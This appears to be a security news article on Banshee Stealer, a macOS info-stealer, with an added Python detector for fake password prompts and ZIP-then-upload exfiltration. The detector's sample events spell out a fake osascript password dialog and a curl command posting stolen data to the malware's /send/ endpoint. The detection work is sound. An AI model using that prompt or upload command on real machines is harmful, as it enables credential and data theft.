Cybersecurity researchers have uncovered new stealer malware that is designed to specifically target Apple macOS systems.
Dubbed Banshee Stealer, it is offered for sale in the cybercrime underground for a steep price of $3,000 a month and works across both x86_64 and ARM64 architectures.
“Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat,” Elastic Security Labs said in a Thursday report.
The web browsers and crypto wallets targeted by the malware include Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Vivaldi, Yandex, Opera, OperaGX, Exodus, Electrum, Coinomi, Guarda, Wasabi Wallet, Atomic, and Ledger.
It is also equipped to harvest system information and data from iCloud Keychain passwords and Notes, as well as incorporate a slew of anti-analysis and anti-debugging measures to determine whether it is running in a virtual environment, in an attempt to evade detection.
Furthermore, it uses the CFLocaleCopyPreferredLanguages API to avoid infecting systems where Russian is the primary language.
Like other macOS malware strains such as Cuckoo and MacStealer, Banshee Stealer also leverages osascript to display a fake password prompt to trick users into entering their system passwords for privilege escalation.
Among the other notable features is the ability to collect data from files matching the .txt, .docx, .rtf, .doc, .wallet, .keys, and .key extensions in the Desktop and Documents folders. The collected data is then exfiltrated as a ZIP archive to a remote server (“45.142.122[.]92/send/”).
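As an added example (not code from Elastic's report, from the malware, or from any product named on this page), the following Python sketches how a defender might detect the two behaviours just described in process-execution telemetry: an osascript dialog that asks for input and hides what is typed, and a ZIP archive written under a temp directory followed shortly by an HTTP upload to a bare IP address with a /send/ path. The simplified event schema, the sample events, and the 300-second pairing window are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-execution events in an assumed, simplified
# EDR schema: ts (epoch seconds), pid, ppid, proc (image name), args (full
# command line). They are illustrative and not taken from a real capture.
SAMPLE_EVENTS: List[Dict] = [
    # Fake password prompt: "with hidden answer" masks the typed text.
    {"ts": 100, "pid": 501, "ppid": 400, "proc": "osascript",
     "args": ('osascript -e \'display dialog "macOS needs to update settings. '
              'Please enter your password." default answer "" with title '
              '"System Preferences" with icon caution with hidden answer\'')},
    # Staging the harvested files into a ZIP under a temp directory.
    {"ts": 105, "pid": 502, "ppid": 400, "proc": "zip",
     "args": "zip -r /tmp/.stage/out.zip /tmp/.stage/data"},
    # HTTP POST of that archive to the /send/ path named in the report.
    {"ts": 107, "pid": 503, "ppid": 400, "proc": "curl",
     "args": ("curl -s -X POST -F file=@/tmp/.stage/out.zip "
              "http://45.142.122.92/send/")},
    # Benign: a notification, not a dialog asking for input.
    {"ts": 200, "pid": 601, "ppid": 450, "proc": "osascript",
     "args": "osascript -e 'display notification \"Build finished\"'"},
    # Benign: a plain GET with no staged archive behind it.
    {"ts": 205, "pid": 602, "ppid": 450, "proc": "curl",
     "args": "curl -s https://example.com/updates.json"},
]

# AppleScript dialog that collects masked input. Legitimate admin scripts use
# this too, so treat it as a medium-confidence signal and look at the parent.
FAKE_PROMPT_RE = re.compile(
    r"display dialog\b.*\bdefault answer\b.*\bwith hidden answer\b", re.I | re.S)

# ZIP archive written under a temp location by zip or ditto.
ARCHIVE_RE = re.compile(
    r"\b(?:zip|ditto)\b.*(?:/tmp/|/private/tmp/|/var/folders/)\S*\.zip", re.I)

# curl upload (POST / data / form) to a bare IPv4 address with a /send/ path.
EXFIL_RE = re.compile(
    r"\bcurl\b.*(?:-X\s*POST|--data\b|-d\b|-F\b).*"
    r"\b\d{1,3}(?:\.\d{1,3}){3}/send/?", re.I)

# Archive creation and upload must share a parent and fall within this window
# (assumed value for the example).
PAIR_WINDOW_S = 300


def detect(events: List[Dict]) -> List[Dict]:
    """Return one alert dict per matching behaviour, in timestamp order."""
    alerts: List[Dict] = []
    last_archive_ts: Dict[int, int] = {}  # ppid -> ts of last temp ZIP creation
    for ev in sorted(events, key=lambda e: e["ts"]):
        proc, args = ev["proc"], ev["args"]
        if proc == "osascript" and FAKE_PROMPT_RE.search(args):
            alerts.append({"rule": "osascript_hidden_answer_prompt",
                           "pid": ev["pid"], "ppid": ev["ppid"], "ts": ev["ts"]})
        if ARCHIVE_RE.search(args):
            last_archive_ts[ev["ppid"]] = ev["ts"]
        if proc == "curl" and EXFIL_RE.search(args):
            staged = last_archive_ts.get(ev["ppid"])
            if staged is not None and ev["ts"] - staged <= PAIR_WINDOW_S:
                alerts.append({"rule": "temp_zip_then_post_to_ip_send",
                               "pid": ev["pid"], "ppid": ev["ppid"], "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run it as a script to print the two alerts raised on the sample events. The `with hidden answer` construct is also used by legitimate admin and MDM scripts, so in production pair the osascript rule with the parent process (a prompt spawned by a freshly downloaded app bundle is far more suspicious than one from a known management agent). The bare-IP plus /send/ rule is tied to this campaign; the archive-then-upload pairing under a shared parent carries better across stealer variants.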
“As macOS increasingly becomes a prime target for cybercriminals, Banshee Stealer underscores the rising observance of macOS-specific malware,” Elastic said.
The disclosure comes as Hunt.io and Kandji detailed another macOS stealer strain that leverages SwiftUI and Apple’s Open Directory APIs to capture and verify passwords entered by the user in a bogus prompt displayed in order to complete the installation process.
“It begins by running a Swift-based dropper that displays a fake password prompt to deceive users,” Broadcom-owned Symantec said. “After capturing credentials, the malware verifies them using the OpenDirectory API and subsequently downloads and executes malicious scripts from a command-and-control server.”
This development also follows the continued emergence of new Windows-based stealers such as Flame Stealer, even as fake websites masquerading as OpenAI’s text-to-video artificial intelligence (AI) tool, Sora, are being used to propagate Braodo Stealer.
Separately, Israeli users are being targeted with phishing emails containing RAR archive attachments that impersonate Calcalist and Mako to deliver Rhadamanthys Stealer.